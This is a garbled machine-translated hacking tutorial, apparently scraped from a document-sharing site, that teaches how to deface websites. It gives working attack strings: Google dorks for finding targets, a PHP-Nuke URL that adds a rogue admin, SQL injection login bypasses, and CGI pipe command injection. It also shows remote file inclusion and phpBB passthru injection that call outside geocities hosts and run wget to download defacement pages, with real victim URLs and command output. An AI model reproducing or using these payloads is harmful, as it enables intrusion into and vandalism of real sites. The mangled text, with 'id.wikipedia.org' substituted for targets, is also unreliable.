Tehnika Brzo Zbrisati Hack Web Id.wikipedia.org

  • Uploaded by: tatatara
  • 0
  • 0
  • May 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Tehnika Brzo Zbrisati Hack Web Id.wikipedia.org as PDF for free.

More details

  • Words: 1,966
  • Pages: 8
Tehnika brzo zbrisati hack web id.wikipedia.org Objavljeno 7. listopad 2005 u Hakiranje 23:25 sati Zamrljati php nuke site Idi na stranicu www.google.com zatim upi�ite => allinurl:. com / nuke / index.php ili allinurl:. org / nuke / index.php. Nah ... .. kalo udah ketemu id.wikipedia.orgnya korak je sljedeci: 1. www.id.wikipedia.org.com / nuke / index.php 2. www.id.wikipedia.org.com / nuke / admin.php => index.php sam promijenio preko ranije u admin.php 3. Unesite bug iza ove stranice prije nego �to: ? AddAuthor & op = add_aid = budakbaonk & add_name = Bog = gad add_pwd & & add_email = [email protected] & add_radminsuper = admin = 1 & eCcgVU5JT04gU0VMRUNUIDEvKjox npr. www.id.wikipedia.org.com / nuke / admin.php? op = AddAuthor & add_aid = budakbaonk & add_name = Bog = gad add_pwd & & add_email = [email protected] & add_radminsuper = admin = 1 & eCcgVU5JT04gU0VMRUNUIDEvKjox �ta �elim da znaci site je na stranici admin put nya Ama. Ali bio sam uspje�an, onda URL / pregledavanja pojaviti lu www.id.wikipedia.org.com/nuke/admin.php?op=mod_author 5. Lu tamo, kako bi se prijava, idite & id lozinku lu liniju. JA pa ipak sjecati se? id = budakbaonk => liat yg diatas tadi password = scalawag => liat yg diatas tadi Nah lu skrg udah ulaz u "Administration Menu" stranici. Mislim lu skrg mengusai stranici! On je on je bio Lu Skrg odaberite sliku Handphone (ispod Poruke imati posts) Stupac naslov => Stupac sadr�aj => Stupac isteka => neograniceno kliknite na karticu i kako dodati poruku u nastavku Kalo udah, otvorite URL / pregledavanja web stranice, a zatim upi�ite novi id.wikipedia.org ranije, npr. www.id.wikipedia.org.com / ili www.id.wikipedia.org.com nuke / nuke / index.php Nemam rezultate zamrljati lu poku�ate osvje�iti postojecu kliknite karticu Pored url iznad / pregledavanja lu ======================================== Zamrljati ASP / IIS s koristenjem osvojiti 98

1. Kliknite na ikonu "My Computer" na va�em racunalu. 2. Nadi Icon "Web Folder" To je u My Computer. 3. Icon opet Klick "Dodaj web mapu" i pojavit ce se "Tip lokacije za dodavanje". 4. Upi�ite naziv lokacije cemo zamrljati / dodavanje datoteka npr. http://www.52down.com. Zatim kliknite Next. 5. Pojavljuju se "Unesite naziv za ovu web-mapu", a zatim kliknite Zavr�i. ako ne postoji "Zavr�i" ili "Error" znaci ne mo�e dideface musti pretra�ivanje tako da id.wikipedia.org drugima. 6. Kada uspije, vratite se na web-folder, tamo smo vidjeli http://www.52down.com datoteke. Kliknite na sliku na stranici. 7. Otvorite datoteku "Hacked.html", koju ste upravo sada (da ne moram html datoteku, lu prvi ms.fronpage u HTML datoteke spremaju se u racunalu Lu) dalje kopirati, a zatim se vratite se na datoteku http://www.52down.com, I zalijepite datoteku "Test.html" liniju. Ako ne mo�ete zalijepiti u srednji Ja dipath isti adminnya, tako da id.wikipedia.org musti drugu pretragu. 8. Kada uspije, vidimo rezultate u URL / pregledavanja npr. http://www.52down.com/Test.html 9. Ako �elite istra�ivati kako id.wikipedia.org www.google.com u potrazi dalje tipa u allinurl:. hr / index.asp ili allinurl:. org / default.asp live kreativnost vam id.wikipedia.org. Ili mogu pretra�ivati id.wikipedia.org u http://www.zone-h.org/en/defacements/ JA klik na desnoj strani ogledalo (do Windows 2000), Napomena svojim id.wikipedia.org => Defacer: Infektion Group Domena: www.namaid.wikipedia.org.com <
Kori�tenjem SQL Injection tehnike, mo�emo mendeface guestbook (guestbook) obje datoteke php, asp, cfm, CGI, HTML i kawan2. Ja Ingat2 mogu sve dideface guestbook. KORAK 2 I. Tra�i id.wikipedia.org u knjigu gostiju sa www.google.co.id site: guestbook.php ili moj site: hr bukutamu.php II. �to mogu id.wikipedia.org je, na primjer www.namaid.wikipedia.org.my / guestbook.php lu onda �to trebate uciniti je ispuniti kolom2 guestbook vam na raspolaganju. Lu mi je potrebno da popunite polja guestbook s izvornom identitetu, jednostavno la�ni identitet aja. primjer: Ime: funny lutka Email: [email protected] Web stranica: www.boneka-lucu.com Porijeklo: market lutke Komentar: Napomena baik2 postojece komentare u poljima, u dobrom SQL Injection na stranici guestbook, tu cemo uci slika (slike porno jgn ya? nece biti lho? ntar mama dimarah). Vi kliknite na "submit" dugme ili �to Imam svoje ime u knjigu gostiju stranice. Zatim otvorite URL / pregledavate nove trus Vrsta id.wikipedia.org ranije www.namaid.wikipedia.org.my / guestbook.php Ukoliko nema rezultata, poku�ajte klikom na tab "Osvje�i" na strani url / pregledavanja lu. Nah ... ja se pojaviti DEH sliku prije nego �to odemo na guestbook stranicu. Znaci da se web stranice mogu dideface guestbook. Napomena: JA dont imati slike, samo ako imate posts znaci guestbook stranici mogu dideface. Lu dong jgn razocaran! tra�i id.wikipedia.org drugo. III. Kako prikazati sliku prije nego �to smo unijeli, ponovo otvoriti guesbook stranicu. Da li je sadr�aj vi�e dostupna vam kolom2 guestbook. primjer: Ime: zamrljati Email: [email protected] Web stranica: www.deface.com Porijeklo: u virtualnom svijetu komentar: Napomena baik2 postojece komentare u stupcu s SQL Injection na stranici guestbook, tu cemo uci u skriptu za nejasnim. Napomena: Lu prije ulaska u skriptu gore ranije, Lu kata2 prvi urediti odgovarajuci

lu �elju. IV. Kliknite na "Submit" gumb, ili ono ime koje ste u guestbook stranicu. Zatim otvorite URL / pregledavanja su novu vrstu id.wikipedia.org ranije www.namaid.wikipedia.org.my / guestbook.php Ukoliko nema rezultata, poku�ajte klikom na tab "Osvje�i" na strani url / lu pregledavanja. Nah ... prika�i DEH zamrljati na�e rezultate u guestbook stranicu. ====================================== zamrljati sql injekciju u asp 1. otvoreni pregledavanja / url www.google.co.id 2. Vrsta stranice: go.id login.asp npr. mo�emo id.wikipedia.org svojim www.namaid.wikipedia.org.com / login.asp 3. upi�ite korisnicko ime i pass' ili '=' 4. otvoriti datoteke jedan po jedan ste tamo 5. JA nadi datoteku mo�emo promijeniti / zamrljati 6. otvoreni pregledavanja / url trus novi tip id.wikipedia.org svojim ranijim primjer www.namaid.wikipedia.org.com 7. �to rezultata jo� nije tu, kliknite na karticu uz osvje�iti url lu ====================================== zamrljati cgi https: / / bronte.netpresence.com.au / ~ wolfsecu / coartcds / Web_store / web_store.cgi? page = coart_frontpage.html << https: / / bronte.netpresence.com.au / ~ wolfsecu / arai.html ... / Home/sites/site52/users/wolfsecu/web/coartcds/Web_store << allinurl: * *. cgi stranici: .* + html site:. http://www.google.co.id/search?q=allinurl ili nas: *. cgi 3Fpage%% 3D *. html + site:. hr & hl = hr & Lr = & start = 10 & sa = N musti id.wikipedia.org svojim html datoteke koju �elite diujung svojim tambahin | pwd | ======================================= zamrljati cgi II http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id | http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd |

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo "sjeckan by psihofiziolo�ko. Admin Hej ... da li je potrebna pomoc? Matrix.Dal.Net - surabayahack "> / usr/home/web/users/a0004481/html/adspro/jh.html | http://www.sports-media.org/adspro/jh.html http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm <>>>>>> usr/home/web/users/a0004481/html / adspro / cgi-bin / adspro usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< bilje�ku baik2 usr/home/web/users/a0004481/html/adspro/jh.html <<<<<<<< bilje�ku baik2 cgi-bin/adspro <<<<<<< uklonjen liat index.html file => http://www.sports-media.org/adspro/cgibin/adspro/dhtml.pl?page=top.htm|whereis% 20index.html | http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo "sjeckan by psihofiziolo�ko. Admin Hej ... da li je potrebna pomoc? Matrix.Dal.Net surabayahack "> decae.html | & cart_id = 9721374.5730 http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo 20% ====================================== zbrisati s php injekcije http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4 izvorna datoteka modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path = to je bug http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root _path=http://www.geocities.com/sandal_karet/script/arai2.jpg? tako index.php? name = PNphpBB2 & file = index & c = 4 uklonjen kako ubrizgati svojim http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root _path=http://www.geocities.com/sandal_karet/script/arai2.jpg? unix naredbu dikotak ici wget http://geocities.com/nusantarajaya_2004/arai.html kako tvrd to http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html http://www.narnia-chroniken.de <<
ript/arai2.jpg? dikotak idi: http://www.geocities.com/nusantarajaya_2004/arai.html wget-O / izvoz / home / beangyy / www / arai.html kako tvrd to http://www.giphted.com/arai.html ========================================= zamrljati phpBB / forum http://www.id.wikipedia.org/forum/index.php izvorna datoteka ukljucuje / db.php? phpbb_root_path = to je bug pa uklonjena index.php http://www.id.wikipedia.org/forum/includes/db.php?phpbb_root_path=http://www.geoci ties.com/sandal_karet/script/ara2.jpg? dikotak idi: pwd �to izlaz "hackiranje" znaci dipath Ali sam bio uspje�an, to je kao u Lu ... ... apain ========================================== zamrljati phpBB / forum II http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12 izvorna datoteka & =% Istaknuti 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd to je bug kako ubrizgati svojim http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd Imam ga wget 3 nacina: 1.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / / geocities.com/nusantarajaya_2004/arai.html ; izg 2.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / / geocities.com/nusantarajaya_2004/arai.html -O / var/www/singapore/jh2.htm 3.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = lwp-download% 20http: / / geocities.com/nusantarajaya_2004/arai . html; izg uobicajeni nacin na njenu uspje�nu 3. kako tvrd to http://singapore.bluejackings.net/arai.html ========================================= Ja liat FS bez prijave http://www.friendster.com/useropen.php?uid = <<<<<< Idi svojim id broj =========================================== zbrisati s php injekcije III

direktno u strijeljajte aja BOS biar ga lama2 www.id.wikipedia.org.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_ path=http://www.geocities.com/ank_newz/sql.htm? Kolo uspje�na kao i obicno cmd php sql injekciju �to pristup mapi cmd => nadi / trajna-777-D �to mapu permision zanijeka ga znaci da mo�e biti u toj mapi apa2 pronaci mapu imate bilo posts trajna ga uzeti primjer http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?php bb_root_path=http://www.geocities.com/ank_newz/sql.htm? tra�i pristup mapi [commndnya iznad] cmd => nadi / trajna-777-D ce jesti B / W sabar aja JD === Primjer-trajna == zanijeka naci: / + mnt/drive2/lost naci: Dozvola odbijena pronaci: / proc / TTY / driver: Dozvola odbijena naci: / proc/1/task/1/fd: Dozvola odbijena to znaci da nema pristup nademo druge JA probati TP folder / var / www / Takoder sam ga GPP imati drugo / Home / httpd / vhosts / hdca.org / httpdocs / downloads => primjer mape mo�ete cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; [bazu komandom OSnya] [bazu komandom OSnya] => wget, dir, macka, rm, RV-RF itd skarang smo wget cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; wget http://www.geocities.com/nusantarajaya_2004/arai.html evo idu probati do cmdnya -------------------10:35:01 - Http: / / www.geocities.com/nusantarajaya_2004/arai.html => `Arai.html ' Rje�avanje www.geocities.com 66.218.77.68 ... Spajanje na www.geocities.com [66.218.77.68]: 80 ... spojeni. HTTP zahtjev poslan, Cekanje odgovora ... 200 OK Du�ina: 6,021 [text / html] 0k ... .. 100% 98,21 kB / s 10:35:02 (98,21 kB / s) - `arai.html 'spremljene [6,021 / 6,021] ------------------to znaci da je uspjeh za spremanje jer httpdocs jednostavan nacin liatnya / Home / httpd / vhosts / hdca.org / httpdocs / downloads => www.hdca.org/downloads/ [datoteku zamrljati lo] Primjerice www.hdca.org / Preuzimanja / arai.html selsai DEH se lako http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/ http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk = http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/ sql.htm?&cmd=id; pwd http://img143.imageshack.us/img143/6782/hacked8lc.jpg

http://www.sobatpadi.net/download/ http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities .com/dian_maulani2005/inject.htm?&cmd=id; pwd;% 20 ks-la http://www.infokomputer.com/aktual/aktua

Related Documents

Danh Ba Hack Web
November 2019 3
Hack
October 2019 30
Hack
November 2019 40
Hack
May 2020 17

More Documents from "tatatara"

May 2020 3
May 2020 4
May 2020 2